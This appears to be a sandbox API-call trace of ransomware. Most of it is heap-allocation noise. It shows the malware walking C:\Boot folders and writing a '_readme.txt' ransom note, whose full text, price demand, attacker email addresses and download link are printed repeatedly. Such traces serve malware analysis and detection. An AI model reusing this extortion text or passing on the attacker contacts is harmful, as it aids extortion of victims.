[0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.844] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0200.844] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.844] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.844] PathFindFileNameW (pszPath="") returned="" [0200.844] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.844] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.844] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.844] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.844] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0200.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.845] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0200.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.845] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.845] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.845] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.845] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.845] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.846] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.846] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.846] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.846] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: 